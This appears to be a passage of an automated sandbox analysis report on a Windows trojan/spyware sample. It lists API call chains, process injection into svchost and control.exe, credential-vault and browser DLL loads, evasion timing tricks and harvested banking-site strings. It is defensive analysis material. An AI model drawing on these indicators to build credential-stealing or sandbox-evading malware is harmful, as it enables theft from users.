                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B6D8487_2_04B6D848
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04B6E9007_2_04B6E900
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E6EA12 appears 86 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E35130 appears 58 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E47E54 appears 111 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04DEB970 appears 280 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E7F290 appears 105 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: String function: 00445AE0 appears 65 times
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2128495548.00000000043A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.FileRepMalware.20173.21714.exe
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2128651272.00000000046AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.FileRepMalware.20173.21714.exe
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeFile created: C:\Users\user\AppData\Local\Temp\definitizationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCommand line argument: #v0_2_0040D6B0
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: control.exe, 00000007.00000002.4579928297.000000000302D000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.000000000300B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000003.2685813657.0000000003000000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.0000000003000000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000003.2685722805.0000000002FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeReversingLabs: Detection: 42%
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeVirustotal: Detection: 43%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exe"Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeStatic file information: File size 1362837 > 1048576
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HJizhlDIjKVk.exe, 00000006.00000002.4580974081.0000000000EBE000.00000002.00000001.01000000.00000005.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4580029284.0000000000EBE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127383592.0000000004280000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127510930.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413433796.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2411866583.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.0000000003800000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2514339637.0000000004C1A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2512542045.0000000004A64000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: control.pdb source: svchost.exe, 00000002.00000003.2480967498.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479992391.000000000321A000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581155174.0000000001038000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127383592.0000000004280000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.20173.21714.exe, 00000000.00000003.2127510930.0000000004580000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2413433796.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2411866583.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2512997485.0000000003800000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000003.2514339637.0000000004C1A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2512542045.0000000004A64000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4584498252.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.2480967498.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479992391.000000000321A000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000006.00000002.4581155174.0000000001038000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: control.exe, 00000007.00000002.4589404879.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.0000000002F89000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2793957275.000000000B16C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: control.exe, 00000007.00000002.4589404879.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4579928297.0000000002F89000.00000004.00000020.00020000.00000000.sdmp, HJizhlDIjKVk.exe, 00000009.00000002.4584541211.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2793957275.000000000B16C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: SecuriteInfo.com.FileRepMalware.20173.21714.exeStatic PE information: real checksum: 0xa961f should be: 0x15c1ad
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041F125 push esi; ret 2_2_0041F133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004141E8 push C8D5F777h; ret 2_2_004141ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402187 push ss; retf 2_2_004021A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00424A53 push es; iretd 2_2_00424AA5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F0 push eax; ret 2_2_004032F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413B2C push FFFFFFFCh; ret 2_2_00413B2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004243E3 push edi; iretd 2_2_004243EB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A553 push es; retf DC82h2_2_0040A638
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416718 push 00000032h; retf 2_2_0041671A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418FF6 pushad ; iretd 2_2_00418FFB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380225F pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038027FA pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380283D push eax; iretd 2_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03801368 push eax; iretd 2_2_03801369
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0438DC9E push esi; ret 6_2_0438DCAC
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_043935CC push es; iretd 6_2_0439361E
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_043826A5 push FFFFFFFCh; ret 6_2_043826A7
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_0438414E push esi; iretd 6_2_0438415D
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_04385291 push 00000032h; retf 6_2_04385293
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exeCode function: 6_2_04387B6F pushad ; iretd 6_2_04387B74
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DC27FA pushad ; ret 7_2_04DC27F9
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DC225F pushad ; ret 7_2_04DC27F9
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DC283D push eax; iretd 7_2_04DC2858
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04DF09AD push ecx; mov dword ptr [esp], ecx7_2_04DF09B6
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B622E2 push esi; iretd 7_2_00B622F1
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B5E26C push 2A266662h; ret 7_2_00B5E241
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B70564 push esi; ret 7_2_00B7056A
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B60839 push FFFFFFFCh; ret 7_2_00B6083B
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B70D64 push eax; retf 7_2_00B70D66

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (132).png
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeAPI/Special instruction interceptor: Address: 3D99FCC
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 2756Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 7216Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87604
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\control.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\control.exe TID: 4072Thread sleep count: 2756 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 4072Thread sleep time: -5512000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 4072Thread sleep count: 7216 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 4072Thread sleep time: -14432000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe TID: 1016Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe TID: 1016Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe TID: 1016Thread sleep time: -41000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe TID: 1016Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe TID: 1016Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00B6C510 FindFirstFileW,FindNextFileW,FindClose,7_2_00B6C510
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: 8H1GI19a3.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 8H1GI19a3.7.drBinary or memory string: discord.comVMware20,11696487552f
                Source: 8H1GI19a3.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 8H1GI19a3.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 8H1GI19a3.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
